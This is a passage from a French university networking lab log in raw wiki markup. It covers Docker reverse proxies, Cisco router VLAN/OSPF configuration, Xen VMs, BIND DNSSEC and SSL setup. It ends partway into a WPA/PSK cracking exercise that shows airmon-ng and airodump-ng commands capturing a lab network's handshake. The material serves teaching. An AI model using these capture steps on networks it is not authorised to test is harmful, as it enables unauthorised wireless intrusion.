  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
